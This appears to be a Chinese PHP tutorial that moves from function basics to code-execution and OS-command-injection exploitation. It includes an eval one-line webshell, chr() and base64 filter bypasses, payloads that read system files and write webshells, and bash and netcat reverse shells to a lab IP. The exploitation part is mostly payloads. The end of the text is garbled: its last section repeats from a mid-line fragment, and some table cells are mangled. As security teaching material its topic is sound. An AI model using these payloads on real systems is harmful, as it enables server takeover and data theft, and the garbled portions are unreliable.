函数定义:函数就是可以完成固定功能的语句或语句集合,可以重复调用。
function 函数名(形式参数1,形式参数2...){
//函数体
return 返回值;
}
函数名();
定义一个简单的函数:
// funtion.php
function test(){
echo "This is function ".__FUNCTION__;
}
test();
说明:_FUNCTION_:输出当前函数的名字。
// function.php
function add($x, $y){
$sum = $x + $y;
return $sum;
}
echo add(10, 3);
注意:
函数的调用,函数名加上小括号。
function a(){
echo "This is func ".__FUNCTION__."<br />";
}
function b(){
echo __FUNCTION__." is starting...<br />";
a();
echo __FUNCTION__." is stopped!<br />";
}
b();
注意:
局部变量,就是在函数内部定义的变量,默认情况下,函数外部不能直接访问函数内部定义的变量。
// function.php
function get_name(){
$username = "AJEST";
echo "My name is {$username}";
}
get_name();
echo $username; // Notice: Undefined variable: username
全局变量是在脚本中,函数或类的外部定义的变量。
// function.php
$username = "AJEST";
function get_name(){
echo "My name is {$username}";
}
get_name(); // Notice: Undefined variable: username
注意:PHP 语言中,函数内部是没有办法直接调用函数外部的变量,这一点与JavaScript 和Python 不同。
可以有如下变通方法:
$username = "AJEST";
function get_name($username){
echo "My name is {$username}";
}
get_name($username);
// function.php
$username = "AJEST";
function get_name(){
global $username;
echo "My name is {$username}";
}
get_name();
默认传参方式。
function add($x, $y){
$sum = $x + $y;
return $sum;
}
echo add(10, 3);
对形参的操作,不会改变实参的值。
可以给形式参数设置默认值,设置方法很简单直接赋值即可。
给函数默认值的时候,全都给。
function add($x = 0, $y = 0){
$sum = $x + $y;
return $sum;
}
// echo add(); // 0
// echo add(10, 3); // 13
echo add(10); // 10
可变函数也叫变量函数,动态函数,函数名可以动态设置和调用,变量()。这是PHP 特性之一,这种特性通常会被攻击者所利用。
直接把函数名赋值给变量,通过修改变量的值,可以实现动态调用。PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。
示例
function a(){
echo "This is function a";
}
function b(){
echo "This is function b";
}
// a();
// b();
// $func_name = "b";
$func_name = ($_GET['func_name']);
$func_name(); // a();
// b();
// phpinfo();
通过可变函数实际上可以调用任意PHP 函数。
$_GET['a']($_GET['b']);
可变函数不能用于,例如echo,print,unset(),isset(),empty(),include,require,eval 等类似的语言结构。
可以使用自己的包装函数来将这些结构用作可变函数。
function e($code){
@eval($code);
}
$_GET['a']($_GET['b']);
//?a=e&b=phpinfo();
//?a=e&b=ipconfig;
说明:
内部(内置)函数,PHP 提供许多现成的函数或者语言结构,可以直接使用。
system(); // 执行外部程序,并且显示输出
PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。
| 函数或语句或结构 | 含义 |
|---|---|
| eval() | 将符合PHP 语法规范字符串当作php 代码执行 |
| assert() | 将字符串当做PHP 代码来执行 |
| preg_replace() | 对字符串进行正则匹配后替换 |
| call_user_func() | 用于调用一个回调函数,并将参数作为参数传递给回调函数。 |
| call_user_func_array() | 用于以数组形式调用一个回调函数,并将参数作为数组的元素传递给回调函数。 |
| array_map() | 用于将回调函数应用于一个或多个数组的所有元素,并返回一个新的数组,其中包含应用回调函数后的结果。 |
| a ( a( a(b) | 动态函数 |
| system() | 能够将字符串作为操作系统(Operator Sytstemc,OS)命令执行 |
| exec() | 用于执行操作系统的命令,并返回命令的输出或结果。 |
| shell_exec() | 用于在服务器上执行 shell 命令,并将命令的输出作为字符串返回。 |
| passthru() | 用于执行命令并将输出直接发送到标准输出(通常是浏览器) |
| popen() | 用于执行命令并通过管道将其输入或输出与程序相关联。它创建一个文件指针(类似于打开文件)以用于读取或写入命令的输出或输入。 |
| 反引号 | 反引号` 内的字符串,会被解析成OS 命令。 |
eval() 会将符合PHP 语法规范字符串当作php 代码执行。
代码示例:
<?php
// $code = "phpinfo();";
// echo $code;
// var_dump($code);
$code = $_REQUEST['code'];
eval($code);
?>
一句话木马原型。
在虚拟机的浏览器中输入?code=phpinfo();页面显示效果:
$code = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];
//empty() 是一个 PHP 函数,用于检查给定变量是否为空或不存在。在这里,它用于检查用户是否提供了 "code" 参数或该参数的值为空。
$code = addslashes($code);
//addslashes($code) 这个命令的作用是对变量 $code 中的字符串进行转义处理。
//echo $code;
eval($code);
如果参数进入eval() 语句之前,进行了过滤,例如过滤了单双引号,可以采用如下方法进行绕过:
ASCII 编码
system('whoami');
chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(119).chr(104).chr(111).chr(97).chr(109).chr(105).chr(39).chr(41).chr(59)
?code=eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(119).chr(104).chr(111).chr(97).chr(109).chr(105).chr(39).chr(41).chr(59));
BASE64 编码
system('whoami');
c3lzdGVtKCd3aG9hbWknKTs=
?code=eval(base64_decode(c3lzdGVtKCd3aG9hbWknKTs));
说明:虽然可以使用函数的方式调用eval(),但是eval() 不是PHP 的函数,是一种语法结构,不能动态调用。在eval() 执行的字符串要以分号结束。
其他命令执行的方式:
?code=phpinfo();
?code=${phpinfo()};
?code=ajest;phpinfo();
?code=?>AJEST IS HANDSOME<?php phpinfo();
?code=eval(phpinfo());
安全的过滤防止潜在的安全漏洞
在使用 eval() 函数之前,可以通过以下方法对用户输入进行过滤和验证,防止潜在的安全漏洞:
disable_functions 配置指令在 php.ini 文件中禁用一些敏感的函数,例如 exec()、system()、shell_exec()、passthru() 等可以执行系统命令的函数。is_numeric()、intval()、filter_var() 等进行输入验证,确保用户提供的参数符合预期的数据类型或格式要求。addslashes()、htmlspecialchars() 等对特殊字符进行转义,确保它们不会破坏代码结构或引入安全风险。assert():会将字符串当做PHP代码来执行。
代码示例:
<?php
// $code = "phpinfo();";
// var_dump($code);
$code = $_REQUEST['code'];
assert($code);
?>
说明:
preg_replace() 函数的作用是对字符串进行正则匹配后替换。
代码示例:
<?php
$code = preg_replace('~a~', 'A', 'ajest');
$code = preg_replace('~\[.*\]~', 'A', '[phpinfo()]');
$code = preg_replace('~\[(.*)\]~', 'A', '[phpinfo()]');
$code = preg_replace('~\[(.*)\]~', '\\1', '[phpinfo()]');
$code = preg_replace('~\[(.*)\]~e', '\\1', '[phpinfo()]');
echo $code;
?>
说明:
函数原型如下:
preg_replace($pattern, $replacement, $subject, $limit = -1, &$count = null): mixed
搜索 s u b j e c t 中匹配 subject 中匹配 subject中匹配pattern 的部分,以$replacement 进行替换。
preg_replace() 函数中第一个参数是正则表达式,e 是正则表达式的修饰符。
preg_replace('~\(.*\)~', 'A', '[phpinfo()]');代码解析如下:
~\[.*\]~:这是一个正则表达式模式,用来匹配方括号括起来的内容。其中,~ 是正则表达式的分隔符,\( 表示匹配左括号 (,.* 表示匹配任意字符零次或多次,\) 表示匹配右括号 )。
'A':是替换匹配到的内容的字符串,将匹配到的 [...] 部分替换为字符 'A'。
一个函数调用另外一个函数,PHP 语言中回调函数有很多。
<?php
$func = 'assert';
$arg = 'phpinfo();';
call_user_func($func, $arg);
?>
说明:
call_user_func() 是一个 PHP 函数,用于调用一个回调函数,并将参数作为参数传递给回调函数。
assert():是一个 PHP函数,用于检查给定的表达式是否为真。如果表达式的结果为假,则会触发一个断言错误,并中止脚本的执行。
函数原型:
mixed call_user_func(callable $callback, mixed ...$parameters)
参数:
$callback:要调用的回调函数。它可以是一个函数名的字符串,也可以是一个包含对象和方法名的数组,或者是一个匿名函数。$parameters:可选的参数,用于传递给回调函数。返回值:
false。<?php
$func = "assert";
$arg[] = "phpinfo();";
array_map($func, $arg);
?>
说明:
用于将回调函数应用于一个或多个数组的所有元素,并返回一个新的数组,其中包含应用回调函数后的结果。
函数原型:
array array_map(callable $callback, array $array1, ...)
参数:
$callback:要应用于每个数组元素的回调函数。$array1:第一个要处理的数组。...:可选的额外数组,可以提供多个数组进行处理。返回值:
由于PHP 的特性原因,PHP 的函数支持直接由拼接的方式调用,这直接导致了PHP 在安全上的控制有加大了难度。不少知名程序中也用到了动态函数的写法,这种写法跟使用call_user_func() 的初衷一样,用来更加方便地调用函数,但是一旦过滤不严格就会造成代码执行漏洞。
<?php
$code = "phpinfo();";
$func = "assert";
$func($code); // assert(phpinfo());
?>
system() 能够将字符串作为操作系统(Operator Sytstemc,OS)命令执行。在类似systemc() 函数调用系统命令时,PHP 会自动区分平台。
代码示例:
<?php
// $cmd = "net user";
$cmd = $_REQUEST['cmd'];
system($cmd);
?>
说明:
?cmd=whoami
?cmd=ipconfig
?cmd=uname -a
exec():用于执行操作系统的命令,并返回命令的输出或结果。
代码示例
<?php
// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];
echo exec($cmd);
?>
函数特点:
shell_exec():用于在服务器上执行 shell 命令,并将命令的输出作为字符串返回。
代码示例:
<?php
// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];
echo shell_exec($cmd);
?>
说明:
passthru():用于执行命令并将输出直接发送到标准输出(通常是浏览器)。
代码示例:
<?php
// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];
passthru($cmd);
?>
说明:
popen():用于执行命令并通过管道将其输入或输出与程序相关联。它创建一个文件指针(类似于打开文件)以用于读取或写入命令的输出或输入。
代码示例
<?php
$cmd = $_REQUEST['cmd'];
$result = popen($cmd, 'r');
echo fread($result, 1024);
//fread() 是一个 PHP 函数,用于从文件指针中读取指定长度的数据。
?>
说明:
函数返回值为文件指针,可以简单理解为文件名。
函数原型:
resource|false popen(string $command, string $mode)
参数:
$command:要执行的命令。$mode:指定管道的模式,可以是 "r"(只读)或 "w"(只写)。返回值:
resource)。false。反引号` 内的字符串,会被解析成OS 命令。
代码示例
<?php
$cmd = "whoami";
//$cmd = "ipconfig";
//$cmd = "net user";
echo "<pre>".`$cmd`;
?>
原理
传入PHP 代码执行函数的变量,客户端可控,并且没有做严格的过滤。那么攻击者可以随意输入(注入,注射,Inject)他想要执行的代码,并且在服务器端执行。如果代码在服务器端执行成功,就认为存在PHP 代码注入漏洞,也就是RCE。
危害
Web 应用如果存在远程代码执行漏洞(RCE)是一件非常可怕的事情,攻击者通过RCE 继承Web 用户权限,执行任意(PHP)代码。
如果服务器没有正确配置,Web 用户权限比较高的话,就可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。
漏洞利用
代码执行漏洞的利用方式有很多种。
获取Shell,中国蚁剑可以直接连接。
shell: http://10.4.7.187/php/functions/eval.php
pass: code
获取当前文件的绝对路径。
?code=print(__FILE__);
读文件。
?code=print(file_get_contents('eval.php'));
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));
写文件。
?code=file_put_contents('shell.php','<?php phpinfo();?>');
原理
应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。
漏洞危害
漏洞利用
OS 命令注入漏洞,攻击者直接继承Web 用户权限,在服务器上执行任意系统命令,危害特别大。
查看系统文件(读)。
?cmd=type c:\windows\system32\drivers\etc\hosts
?cmd=cat /etc/passwd
显示当前路径。
?cmd=cd
写文件。
?cmd=echo ^<^?php phpinfo();^?^> > shell.php
?cmd=echo ^<^?php @eval($_REQUEST[777])^?^> > shell.php
?cmd=echo PD89cGhwaW5mbygpPz4= | base64 -d > shell.php
执行某一个程序。
?cmd=c:\windows\system32\calc.exe
反弹Shell。
# 本机监听
nc -lnvp 1234
# Linux 下反弹Shell
?cmd=bash -i >& /dev/tcp/10.4.7.1/1234 0>&1
?cmd=echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMS8xMjM0IDA+JjE= | base64 -d | bash
# Windows 反弹Shell
?cmd=nc.exe -e cmd.exe 10.4.7.1 1234
漏洞防御
disable_functions = system,assert
2\drivers\etc\hosts
?cmd=cat /etc/passwd
显示当前路径。
```text
?cmd=cd
写文件。
?cmd=echo ^<^?php phpinfo();^?^> > shell.php
?cmd=echo ^<^?php @eval($_REQUEST[777])^?^> > shell.php
?cmd=echo PD89cGhwaW5mbygpPz4= | base64 -d > shell.php
执行某一个程序。
?cmd=c:\windows\system32\calc.exe
反弹Shell。
# 本机监听
nc -lnvp 1234
# Linux 下反弹Shell
?cmd=bash -i >& /dev/tcp/10.4.7.1/1234 0>&1
?cmd=echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMS8xMjM0IDA+JjE= | base64 -d | bash
# Windows 反弹Shell
?cmd=nc.exe -e cmd.exe 10.4.7.1 1234
漏洞防御
disable_functions = system,assert